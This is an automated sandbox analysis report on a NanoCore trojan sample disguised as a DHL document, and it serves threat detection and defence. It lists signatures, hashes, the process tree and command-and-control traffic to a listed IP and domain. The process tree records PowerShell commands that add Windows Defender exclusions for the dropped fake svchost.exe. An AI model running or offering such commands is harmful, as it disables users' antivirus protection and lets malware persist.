Play interactive tour

Edit tour

Analysis Report DHL_document11022020680908911.exe

Overview

General Information

Sample Name:	DHL_document11022020680908911.exe
Analysis ID:	383099
MD5:	dc8e7cde980f05501758f8ce3048682e
SHA1:	fca9c2a66cfddfe6a8677e1568ea32ad18dda600
SHA256:	e3b80db58c1fa79c3780e68cf7d3ea987fb2615a68077ba3b110cfd3a7cf4de6
Tags:	DHLexeNanoCore
Infos:
Most interesting Screenshot:

Detection

NanoCore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Adds a directory exclusion to Windows Defender

Changes security center settings (notifications, updates, antivirus, firewall)

Creates an autostart registry key pointing to binary in C:\Windows

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Executable has a suspicious name (potential lure to open the executable)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Tries to delay execution (extensive OutputDebugStringW loop)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Startup

System is w10x64

DHL_document11022020680908911.exe (PID: 4640 cmdline: 'C:\Users\user\Desktop\DHL_document11022020680908911.exe' MD5: DC8E7CDE980F05501758F8CE3048682E)

powershell.exe (PID: 6240 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6416 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document11022020680908911.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6452 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

DHL_document11022020680908911.exe (PID: 7136 cmdline: C:\Users\user\Desktop\DHL_document11022020680908911.exe MD5: DC8E7CDE980F05501758F8CE3048682E)

DHL_document11022020680908911.exe (PID: 4612 cmdline: C:\Users\user\Desktop\DHL_document11022020680908911.exe MD5: DC8E7CDE980F05501758F8CE3048682E)

svchost.exe (PID: 5688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6264 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6944 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7016 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7024 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7160 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5728 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5436 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 4804 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 4792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 4140 cmdline: 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' MD5: DC8E7CDE980F05501758F8CE3048682E)

powershell.exe (PID: 6424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 4756 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6636 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6084 cmdline: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe MD5: DC8E7CDE980F05501758F8CE3048682E)

svchost.exe (PID: 1156 cmdline: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe MD5: DC8E7CDE980F05501758F8CE3048682E)

svchost.exe (PID: 6812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

dhcpmon.exe (PID: 1288 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: DC8E7CDE980F05501758F8CE3048682E)

svchost.exe (PID: 6984 cmdline: 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' MD5: DC8E7CDE980F05501758F8CE3048682E)

svchost.exe (PID: 5608 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5488 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\DHL_document11022020680908911.exe, ProcessId: 4612, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	ReversingLabs: Detection: 14%
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	ReversingLabs: Detection: 14%

Multi AV Scanner detection for submitted file

Show sources

Source: DHL_document11022020680908911.exe

ReversingLabs: Detection: 14%

Source: unknown	HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.7:49725 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.7:49728 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.7:49732 version: TLS 1.0

Source: DHL_document11022020680908911.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: \??\C:\Windows\dll\System.pdb source: DHL_document11022020680908911.exe, 00000010.00000003.401824383.000000000717D000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: DHL_document11022020680908911.exe, 00000010.00000003.401824383.000000000717D000.00000004.00000001.sdmp
Source:	Binary string: System.pdb source: DHL_document11022020680908911.exe, 00000010.00000003.410586054.000000000714D000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49723 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49726 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49730 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49733 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49737 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49738 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49740 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49743 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49748 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49754 -> 185.191.231.252:54984
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.7:49757 -> 185.191.231.252:54984

Source: global traffic

TCP traffic: 192.168.2.7:49723 -> 185.191.231.252:54984

Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf

Source: Joe Sandbox View

IP Address: 185.191.231.252 185.191.231.252

Source: Joe Sandbox View	ASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.7:49725 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.7:49728 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.7:49732 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252
Source: unknown	TCP traffic detected without corresponding DNS query: 185.191.231.252

Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf

Source: svchost.exe, 00000023.00000003.481947215.000001EB10364000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-06T17:58:28.3925008Z\|\|.\|\|9f1af5de-a917-4d59-b623-fd59991517bf\|\|1152921505693355901\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-04-06T17:57:25.3126054Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
Source: svchost.exe, 00000023.00000003.473525877.000001EB1036D000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000023.00000003.473525877.000001EB1036D000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 